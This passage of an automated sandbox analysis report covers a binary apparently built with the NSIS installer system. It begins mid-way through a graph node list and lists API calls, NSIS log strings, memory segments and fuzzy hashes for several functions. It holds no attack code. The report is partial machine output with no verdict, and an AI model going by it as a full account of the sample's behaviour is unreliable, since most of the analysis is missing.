403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f 

                                                      Control-flow Graph

                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                      • GetClientRect.USER32(?,?), ref: 00405196
                                                      • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                      • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                        • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                      • ShowWindow.USER32(00000000), ref: 004052E7
                                                      • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                      • ShowWindow.USER32(00000008), ref: 00405333
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                      • CreatePopupMenu.USER32 ref: 00405376
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                      • GetWindowRect.USER32(?,?), ref: 0040539E
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                      • OpenClipboard.USER32(00000000), ref: 0040540B
                                                      • EmptyClipboard.USER32 ref: 00405411
                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                      • CloseClipboard.USER32 ref: 0040546E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                      • String ID: @rD$New install of "%s" to "%s"${
                                                      • API String ID: 2110491804-2409696222
                                                      • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                      • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                      • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                      • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                      Control-flow Graph

                                                      APIs
                                                      • #17.COMCTL32 ref: 004038A2
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                      • OleInitialize.OLE32(00000000), ref: 004038B4
                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                      • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                      • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                      • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                      • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                      • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                      • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                      • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                      • ExitProcess.KERNEL32 ref: 00403AF1
                                                      • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                      • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                      • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                      • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                      • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                      • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                      • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                      • API String ID: 2435955865-239407132
                                                      • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                      • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                      • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                      • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                      Control-flow Graph (function beginning at 004074BB; the rendered graph and its Executed / Not Executed colour legend are not reproduced here)
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                      • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                      • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                      • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                      • String ID:
                                                      • API String ID: 310444273-0
                                                      • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                      • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                      • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                      • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                      • FindClose.KERNEL32(00000000), ref: 004062EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                      • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                      • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                      • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                      Control-flow Graph (function beginning at 00405479; the rendered graph and its Executed / Not Executed colour legend are not reproduced here)
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                      • ShowWindow.USER32(?), ref: 004054D2
                                                      • DestroyWindow.USER32 ref: 004054E6
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                      • GetDlgItem.USER32(?,?), ref: 00405523
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                      • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                      • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                      • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                      • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                      • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                      • EnableWindow.USER32(?,?), ref: 00405757
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                      • EnableMenuItem.USER32(00000000), ref: 00405774
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                      • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                      • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                      • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: @rD
                                                      • API String ID: 3282139019-3814967855
                                                      • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                      • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                      • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                      • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                      Control-flow Graph (function beginning at 004015A0; the rendered graph and its Executed / Not Executed colour legend are not reproduced here)
                                                      APIs
                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                      • ShowWindow.USER32(?), ref: 00401753
                                                      • ShowWindow.USER32(?), ref: 00401767
                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                      • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                      Strings
                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                      • detailprint: %s, xrefs: 00401679
                                                      • Jump: %d, xrefs: 00401602
                                                      • Call: %d, xrefs: 0040165A
                                                      • Rename failed: %s, xrefs: 0040194B
                                                      • Rename on reboot: %s, xrefs: 00401943
                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                      • Sleep(%d), xrefs: 0040169D
                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                      • BringToFront, xrefs: 004016BD
                                                      • Aborting: "%s", xrefs: 0040161D
                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                      • Rename: %s, xrefs: 004018F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                      • API String ID: 2872004960-3619442763
                                                      • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                      • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                      • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                      • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                      • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                      • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                      • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                      • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
